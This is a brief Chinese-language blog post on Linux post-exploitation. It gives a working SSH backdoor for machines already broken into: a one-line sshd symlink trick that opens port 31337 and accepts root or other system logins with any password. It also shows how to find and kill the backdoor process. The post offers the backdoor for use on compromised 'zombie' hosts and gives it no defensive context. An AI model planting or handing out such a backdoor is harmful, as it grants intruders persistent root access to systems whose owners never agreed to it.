linux 后渗透测试

学习参考: 

http://weibo.com/1869235073/B9Seswf9R?type=comment 
http://weibo.com/p/1001603723521007220513 
http://www.sohu.com/a/126011736_505860

linux 常用shell反弹方法小结: 
https://edu.aqniu.com/group/3/thread/22

 

1. SSH渗透技巧

1.1 ssh 临时后门

入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口肉鸡上执行

 myles@localhost:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337

就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。效果图:

ssh_backdoor

 

1.2 如何杀死ssh临时后门

临时后门生成后,如果我们需要杀死这个进程,请使用以下语句。

 
myles@localhost# ps -ef |grep 31337 #查询后门进程ID
myles@localhost# kill -9 ssh_pid #使用kill -9 直接杀死进程

 

kill_ssh_backdoor

posted @ 2017-07-26 20:47  myles007  阅读(911)  评论(0编辑  收藏  举报